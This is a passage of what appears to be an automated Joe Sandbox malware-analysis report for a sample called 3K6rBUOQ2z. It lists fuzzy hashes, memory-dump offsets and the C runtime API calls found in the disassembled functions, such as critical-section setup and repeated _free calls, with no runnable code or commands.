                                                    • Instruction ID: ea50400d2fe35106b252ce6c231c1a7215f067e97d08f19ce61575f46e0e1a2b
                                                    • Opcode Fuzzy Hash: 3a45def61f6c16db91f0ffe067a15c73310bbca5a4563e6b2071eeb4ae12a04d
                                                    • Instruction Fuzzy Hash: A2518BF3E081105BE7056A3DCC583B6BAD7DBD4360F1BC63DEA8497788E939080186D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3a9c72409bead2dc48ac6e2b739a1c8c3fbc7565ae803c26795b486a99eed62
                                                    • Instruction ID: 756f2f8f277c69a7e98897c30baa1966294b53e78f435975d51a30bd27c37b29
                                                    • Opcode Fuzzy Hash: a3a9c72409bead2dc48ac6e2b739a1c8c3fbc7565ae803c26795b486a99eed62
                                                    • Instruction Fuzzy Hash: 6F5127F390D3189BF314692DED457BAB7D9EB94320F1B463DDA84C3780E974590582C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7f4335d5c946e6c876159e97036b5af7454c2abef41640b087072f31f97ae96
                                                    • Instruction ID: 94aa7b03b488a32183413bc5a1ce141aa3acdf2dd87102a425b89cb1c6d27e4b
                                                    • Opcode Fuzzy Hash: b7f4335d5c946e6c876159e97036b5af7454c2abef41640b087072f31f97ae96
                                                    • Instruction Fuzzy Hash: B25134F3E482109BF3045928DDD57A6768BD7A8320F2E8239EEA5937D4E9BD4C050286
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39b5d1a3195faa5f8eeb1290e28185de290dab5cad60c17b938a3a1c467c66ed
                                                    • Instruction ID: 4e54d0949e1a65ef1d1e12a0fc2b0d2ba39f57fe8c13a1ea0412da97458cf3c4
                                                    • Opcode Fuzzy Hash: 39b5d1a3195faa5f8eeb1290e28185de290dab5cad60c17b938a3a1c467c66ed
                                                    • Instruction Fuzzy Hash: 31515EF3B044105BE7086D2DDC457BB7BD6EBC0361F2B853CDAC987B84D93859058692
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                    • Instruction ID: b9d8271b3f9c33d4557c4a4576e3425dfb6988ab9ea1f00b6dd8598141c681a7
                                                    • Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                    • Instruction Fuzzy Hash: 3151BCB1E103058FEB25DF5AD9817AABBF2FB48314F54852AC801EB354D339AA11CB65
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a618259c6abeb9c0dcfefa8753072cab7fb3f7d705ed37a0631b150dcec9b9c5
                                                    • Instruction ID: 122adcca3ce385a51106ebeca3594a445f9310708c6a263fb63808028287c2c9
                                                    • Opcode Fuzzy Hash: a618259c6abeb9c0dcfefa8753072cab7fb3f7d705ed37a0631b150dcec9b9c5
                                                    • Instruction Fuzzy Hash: 9D3126F3A082149BE344BA6DDC4463BBBE9DBD0260F1A493DDAC5D3748F93058058296
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d9d7938c181a0405ab9a8c8139215d166b160e69d33fba531d14849073a0ba3d
                                                    • Instruction ID: a90d2a5c165dace7bd37a3c3442cd2e98dfe7e80e6d8c922a31462355b24f1e5
                                                    • Opcode Fuzzy Hash: d9d7938c181a0405ab9a8c8139215d166b160e69d33fba531d14849073a0ba3d
                                                    • Instruction Fuzzy Hash: 0931B0F7A082048FF3186A29DC8577AB396EBD4310F2A853DDF8857784E97A1C058696
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                    • Instruction ID: 5718e3f45fb01b4b9af8bb9843be005a69742a386172f406e5f7262e98beb966
                                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                    • Instruction Fuzzy Hash: BC21B373F204394B7B0CC57ECC522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                    • Instruction ID: 53a9b4596741b4d703b3dee2c66b20d577f2960826688a38eeab8e35c5903ed5
                                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                    • Instruction Fuzzy Hash: 2321B373F205394B7B0CC57E8C522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                    • Instruction ID: 1ad9d6d7365e600a7bb69782b0834f4d420f3f91d9e0c3ac1aa475b9fcfe298e
                                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                    • Instruction Fuzzy Hash: 6521B673F2043947770CC57ECC522BDB6E1C78C501745423AE8A6EA2C1D96CD917E2E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                    • Instruction ID: f0098194cef53a99a5c501967b9cf24841fb35c31397b7ca8774a3519f6b4b04
                                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                    • Instruction Fuzzy Hash: 1011A763F30C255B675C81698C1327AA1D2EBD815074F433AD826E7284E8A4EE13D290
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                    • Instruction ID: e73887866517eae7714d013718d8a8bd1de4ec71e4a0f3fa3c223a6bd36a49e9
                                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                    • Instruction Fuzzy Hash: 3911A723F30C255B675C81698C1727AA1D2DBDC14030F433AD826E7284E894DE13D290
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                    • Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
                                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                    • Instruction Fuzzy Hash: D6118A73F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7284E998DE23D290
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: 26b9b63659b74d42d569804443eca3166b2110a897851afa81f8b7592a678c22
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: 9A1104F72401A243D6048A2FC8F56FBE797EBC632172C426AD0428BB58E333F3559600
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: 7a73fe8d35e3d71c5c24f5c0b821b3dd9abe8ae56d6465770b908d97031b84e3
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: DC1108772C0151439695CB2DDDB41BAA796EBCD32072C46EAD0414F75AD122F544B600
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: bf3d62387290270b8e9c206f9b330aa6ec5fad9da35dacc9460757c01b80fc97
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: 43115EF730038143D704862EC5B45B7E395EBC6321B2F4B7BC0825B7C8C23A9865E50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2703351422.0000000000F89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F89000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_f89000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction ID: f8621d0e7f7ea538b4bd5fb6c729e7e6139332c9e12a69cbf877787ff389319b
                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction Fuzzy Hash: EB1170737441009FDB54DF55DC81FE673EAEB88320B298055ED08CB316D6B5E802D760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction ID: 293818218bedeef1481949536c6cc3e7b8a6b3c3ef9f58d5a142aa209fb16be8
                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction Fuzzy Hash: 8801A276A006148FDF21EF24CC04BAA33F5EFC6216F4548F5EA0A9B281E774B9459B90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                    • Instruction ID: 1921a5297b8c6c131afecabf540933813d04e502e30cb84c4d37dd4a19787586
                                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                    • Instruction Fuzzy Hash: 04E08C32911238EBCB24DB9DC90498AF3EDEB44B00B1544A6B601D3200C274EE00E7D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                    • Instruction ID: 246488dfe49aa5c32b350fed1d045568dcfc0a17c0cb868f336d2f696df64edd
                                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                    • Instruction Fuzzy Hash: 39E08C72911268EBCB25DB8CC945E8AF3FCEB44B80B114496BD01D3220C270EE00C7D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                    • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                    • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                    • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                    • Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
                                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                    • Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                                    • Instruction ID: b91f9200a165f7f20a789dd953a104fe294c578cebaf163ccbdad38ff115fb37
                                                    • Opcode Fuzzy Hash: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
                                                    • Instruction Fuzzy Hash: E7E04631400148BFCB117F25CC48D993F3AEB00281B004424F90986131CB39EE82DA54
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
                                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
                                                    • CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F
                                                    Strings
                                                    • WakeAllConditionVariable, xrefs: 004090C8
                                                    • SleepConditionVariableCS, xrefs: 004090BC
                                                    • kernel32.dll, xrefs: 004090AB
                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                    • API String ID: 2565136772-3242537097
                                                    • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                    • Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
                                                    • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                    • Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D
                                                    APIs
                                                    • _free.LIBCMT ref: 04CF661C
                                                    • ___free_lconv_mon.LIBCMT ref: 04CF6627
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6300
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6312
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6324
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6336
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6348
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF635A
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF636C
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF637E
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF6390
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63A2
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63B4
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63C6
                                                      • Part of subcall function 04CF62E3: _free.LIBCMT ref: 04CF63D8
                                                    • _free.LIBCMT ref: 04CF663E
                                                    • _free.LIBCMT ref: 04CF6653
                                                    • _free.LIBCMT ref: 04CF665E
                                                    • _free.LIBCMT ref: 04CF6680
                                                    • _free.LIBCMT ref: 04CF6693
                                                    • _free.LIBCMT ref: 04CF66A1
                                                    • _free.LIBCMT ref: 04CF66AC
                                                    • _free.LIBCMT ref: 04CF66E4
                                                    • _free.LIBCMT ref: 04CF66EB
                                                    • _free.LIBCMT ref: 04CF6708
                                                    • _free.LIBCMT ref: 04CF6720
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 3658870901-0
                                                    • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                    • Instruction ID: b7e77e35eb60a52c49567081d144d294a1647fec1457516d92eb22022a24bd54
                                                    • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                    • Instruction Fuzzy Hash: C8314B317006009FEBA1AE39DC44B5A77EAAF00714F14842AE295D7252DF7AFA51DB20
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 04B5748E
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57167
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57179
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5718B
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5719D
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571AF
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571C1
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571D3
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571E5
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571F7
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57209
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5721B
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5722D
                                                      • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5723F
                                                    • _free.LIBCMT ref: 04B57483
                                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                    • _free.LIBCMT ref: 04B574A5
                                                    • _free.LIBCMT ref: 04B574BA
                                                    • _free.LIBCMT ref: 04B574C5
                                                    • _free.LIBCMT ref: 04B574E7
                                                    • _free.LIBCMT ref: 04B574FA
                                                    • _free.LIBCMT ref: 04B57508
                                                    • _free.LIBCMT ref: 04B57513
                                                    • _free.LIBCMT ref: 04B5754B
                                                    • _free.LIBCMT ref: 04B57552
                                                    • _free.LIBCMT ref: 04B5756F
                                                    • _free.LIBCMT ref: 04B57587
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                    • Instruction ID: 14cb6ab2ab1a9437f4c82fe233bb491e545522ac7e1cbfa12bd6e5481a9237c1
                                                    • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                    • Instruction Fuzzy Hash: 95316B31B00605AFEB25AE3DE844B5AF7E8EF00354F50489AE869D71B0DF74F8409B20
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 1000A045
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                                      • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                                    • _free.LIBCMT ref: 1000A03A
